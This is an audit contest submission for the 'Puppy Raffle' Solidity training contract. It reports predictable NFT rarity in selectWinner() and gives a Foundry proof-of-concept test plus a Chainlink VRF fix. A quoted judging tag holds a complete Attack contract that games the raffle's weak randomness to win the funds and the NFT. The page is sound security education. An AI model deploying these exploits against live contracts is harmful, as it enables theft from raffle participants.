Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Predictable Rarity Calculation Allows Attacker to Guarantee LEGENDARY NFT Without Playing

choco324

Description

The selectWinner() function determines the rarity of the minted puppy NFT using a hash of msg.sender and block.difficulty. This rarity determines the NFT's value, with LEGENDARY being the rarest (5% probability under normal circumstances).
The rarity calculation relies entirely on predictable values, allowing an attacker to pre-calculate the resulting rarity for any potential caller address before participating in the raffle. The attacker can iterate through addresses until finding one that yields LEGENDARY rarity, then use that address to call selectWinner().

function selectWinner() external {

// ... winner selection logic ...

// We use a different RNG calculate from the winnerIndex to determine rarity

@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

@> if (rarity <= COMMON_RARITY) {

@> tokenIdToRarity[tokenId] = COMMON_RARITY;

@> } else if (rarity <= COMMON_RARITY + RARE_RARITY) {

@> tokenIdToRarity[tokenId] = RARE_RARITY;

@> } else {

@> tokenIdToRarity[tokenId] = LEGENDARY_RARITY;

@> }

// ...

_safeMint(winner, tokenId);

}

Both inputs to the rarity hash are known:

msg.sender - The attacker controls which address calls selectWinner()
block.difficulty - Publicly available blockchain state

Risk

Likelihood:

An attacker iterates through potential caller addresses off-chain before the raffle ends
The attacker identifies an address where keccak256(abi.encodePacked(address, block.difficulty)) % 100 > 95
The attacker calls selectWinner() from that address, combined with the winner manipulation from H-01

Impact:

The attacker guarantees receiving a LEGENDARY puppy NFT (normally 4% chance)
The rarity system becomes meaningless as attackers consistently obtain the rarest NFTs
LEGENDARY NFTs lose value due to artificial inflation from exploited mints

Proof of Concept

The following test demonstrates how an attacker can search for an address that yields LEGENDARY rarity, then use it to guarantee minting the rarest NFT:

Iterate through candidate addresses computing the rarity hash
Find an address where rarity > 95 (LEGENDARY threshold)
Enter the raffle and call selectWinner() from that address
Verify the minted NFT has LEGENDARY rarity

function test_predictRarityBeforePlaying() public {

// Rarity constants from PuppyRaffle

uint256 COMMON_RARITY = 70;

uint256 RARE_RARITY = 25;

uint256 LEGENDARY_RARITY = 5;

// 1. Attacker pre-calculates rarity for candidate addresses without playing

// Rarity only depends on msg.sender and block.difficulty - both known values

address attackerAddress;

uint256 predictedRarity;

for (uint160 i = 1000; i < 10000; i++) {

address candidate = address(i);

uint256 rarity = uint256(keccak256(abi.encodePacked(candidate, block.difficulty))) % 100;

// LEGENDARY: rarity > 95 (96-99)

if (rarity > COMMON_RARITY + RARE_RARITY) {

attackerAddress = candidate;

predictedRarity = rarity;

break;

}

require(attackerAddress != address(0), "Could not find legendary address");

// 2. Setup: 4 players enter the raffle (minimum required)

address[] memory players = new address[](4);

players[0] = playerOne;

players[1] = playerTwo;

players[2] = playerThree;

players[3] = attackerAddress;

vm.deal(attackerAddress, 10 ether);

puppyRaffle.enterRaffle{value: entranceFee * 4}(players);

// 3. Fast forward and select winner from the pre-calculated address

vm.warp(block.timestamp + duration + 1);

vm.prank(attackerAddress);

puppyRaffle.selectWinner();

// 4. Verify the minted NFT has LEGENDARY rarity

uint256 tokenId = 0;

uint256 actualRarity = puppyRaffle.tokenIdToRarity(tokenId);

assertEq(actualRarity, LEGENDARY_RARITY, "Attacker should have gotten LEGENDARY rarity");

}

Recommended Mitigation

Use Chainlink VRF for rarity determination, requesting randomness separately from winner selection or using additional random words from the same request.

function selectWinner() external {

// ... existing checks ...

- uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

- if (rarity <= COMMON_RARITY) {

- tokenIdToRarity[tokenId] = COMMON_RARITY;

- } else if (rarity <= COMMON_RARITY + RARE_RARITY) {

- tokenIdToRarity[tokenId] = RARE_RARITY;

- } else {

- tokenIdToRarity[tokenId] = LEGENDARY_RARITY;

- }

}

+ function fulfillRandomWords(uint256, uint256[] memory randomWords) internal override {

+ uint256 winnerIndex = randomWords[0] % players.length;

+ uint256 rarity = randomWords[1] % 100; // Use second random word for rarity

+ if (rarity <= COMMON_RARITY) {

+ tokenIdToRarity[tokenId] = COMMON_RARITY;

+ } else if (rarity <= COMMON_RARITY + RARE_RARITY) {

+ tokenIdToRarity[tokenId] = RARE_RARITY;

+ } else {

+ tokenIdToRarity[tokenId] = LEGENDARY_RARITY;

+ }

+ // ... rest of winner logic

+ }

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 7 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!